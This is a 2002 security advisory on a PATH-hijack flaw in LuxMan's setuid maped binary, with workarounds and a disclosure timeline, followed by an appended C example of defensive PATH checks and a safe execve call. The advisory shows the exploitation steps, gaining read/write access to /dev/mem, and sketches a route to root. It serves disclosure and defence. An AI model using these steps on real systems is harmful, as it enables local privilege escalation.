iDEFENSE Security Advisory 11.06.02: http://www.idefense.com/advisory/11.06.02.txt
Non-Explicit Path Vulnerability in LuxMan
November 6, 2002

I. BACKGROUND

Frank McIngvale's LuxMan is a Linux-based game similar to Pac Man. More information about it is available at http://packages.debian.org/stable/games/luxman.html.

II. DESCRIPTION

Maped is a setuid binary that belongs to LuxMan. It executes gzip without using the full path. A local attacker can create an exploit binary named gzip and have maped execute it by modifying the PATH environment variable accordingly. The following is a sample run and explanation of an exploit that duplicates /dev/mem to /tmp/mem:

First, the attacker adds the current working directory to the PATH environment variable:

farmer@debian30:~$ export | grep PATH
declare -x PATH="/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
farmer@debian30:~$ declare -x PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
farmer@debian30:~$ export | grep PATH
declare -x PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"

Second, the attacker compiles the exploit as a binary named gzip and creates a fake archive:

farmer@debian30:~$ cc gzip.c -o gzip
farmer@debian30:~$ touch test.gz

Third, the attacker executes the maped binary:

farmer@debian30:~$ `which maped` test.gz
You must be the owner of the current console to use svgalib.
Not running in a graphics capable console, and unable to find one.
Using VGA driver.
svgalib 1.4.3
...

At this point, /dev/mem is being duplicated into /tmp/mem. The descriptor to /dev/mem can be inspected from a separate terminal:

farmer@debian30:~$ lsof | grep /dev/mem
gzip 5197 farmer 5u CHR 1,1 178294 /dev/mem
farmer@debian30:~$ cd /proc/5197/fd/
farmer@debian30:~$ ls -l
total 0
lrwx------ 1 farmer farmer 64 Oct 10 05:56 0 -> /dev/pts/1
l-wx------ 1 farmer farmer 64 Oct 10 05:56 1 -> pipe:[4991]
lrwx------ 1 farmer farmer 64 Oct 10 05:56 2 -> /dev/pts/1
lrwx------ 1 farmer farmer 64 Oct 10 05:56 3 -> /tmp/mem
lr-x------ 1 farmer farmer 64 Oct 10 05:56 4 -> /dev/zero
lrwx------ 1 farmer farmer 64 Oct 10 05:56 5 -> /dev/mem

Descriptor 5 is clearly a read/write descriptor to /dev/mem.

III. ANALYSIS

Any local user can launch this attack to gain read/write access to /dev/mem. Such access can lead to local root compromise. Exploitation is possible by scanning the file for fragments of the master password file and modifying kernel memory to re-map system calls.

IV. DETECTION

LuxMan 0.41, which is packaged and distributed with Debian Linux 3.0r0, is vulnerable. It is probable that the same LuxMan version is vulnerable on other platforms as well.

V. WORKAROUND

Customers should consider one of the following two options:

Option 1: Remove the LuxMan package by issuing the command "# apt-get remove luxman".

Option 2: Remove the setuid bit from the maped binary by executing the command "# chmod -s `which maped`".

VI. VENDOR RESPONSE

The Debian Project has made available an updated LuxMan package that fixes this vulnerability. More information should be available in DSA-189 at http://www.debian.org/security/2002/dsa-189.

VII. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project assigned the identification number CAN-2002-1245 to this issue.

VIII. DISCLOSURE TIMELINE

10/03/2002 Issue disclosed to iDEFENSE
10/31/2002 Maintainer, Janos Lenart (ocsi@debian.org), and security@debian.org notified
10/31/2002 iDEFENSE clients notified
11/02/2002 Responses received from ocsi@debian.org and Martin Schulze (joey@infodrom.org)
11/06/2002 Public disclosure

IX. CREDIT

Texonet (http://www.texonet.com) discovered this vulnerability.

Get paid for security research: http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories: send email to listserv@idefense.com, subject line: "subscribe"

About iDEFENSE: iDEFENSE is a global security intelligence company that proactively monitors sources throughout the world — from technical vulnerabilities and hacker profiling to the global spread of viruses and other malicious code. Our security intelligence services provide decision-makers, frontline security professionals and network administrators with timely access to actionable intelligence and decision support on cyber-related threats. For more information, visit http://www.idefense.com.

-dave

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071
dendler@idefense.com
www.idefense.com
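As an added example (not code from the advisory, LuxMan or Debian), two defensive routines in C for the pattern described in sections II and III: one flags a PATH that contains relative or empty entries, as in the sample run, and the other shows how a setuid program should invoke a helper, by absolute path through execve with a fixed environment, so the caller's PATH is never consulted. The function names and the /bin/gzip location are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Return 1 if any PATH entry is relative or empty (an empty entry means the
 * current directory), i.e. if a bare name such as "gzip" could resolve to a
 * caller-controlled directory. A missing PATH is treated as unsafe too. */
int path_has_unsafe_entry(const char *path)
{
    if (path == NULL) return 1;
    for (;;) {
        const char *colon = strchr(path, ':');
        size_t len = colon ? (size_t)(colon - path) : strlen(path);
        if (len == 0 || path[0] != '/')
            return 1;
        if (colon == NULL) return 0;
        path = colon + 1;
    }
}

/* Run a helper by absolute path with a fixed, minimal environment (execve does
 * no PATH search). Returns the child's exit status, -1 on error or non-absolute path. */
int run_trusted_helper(const char *abs_path, char *const argv[])
{
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };
    if (abs_path == NULL || abs_path[0] != '/') return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(abs_path, argv, clean_env);
        _exit(127);   /* only reached if execve failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed PATH values mirroring the advisory's sample run. */
    const char *hijacked = "./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games";
    const char *normal = "/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games";
    printf("hijacked PATH unsafe: %d\n", path_has_unsafe_entry(hijacked));
    printf("normal PATH unsafe: %d\n", path_has_unsafe_entry(normal));
    char *const argv[] = { "gzip", "--version", NULL };   /* assumed helper location */
    printf("gzip exit status: %d\n", run_trusted_helper("/bin/gzip", argv));
    return 0;
}
```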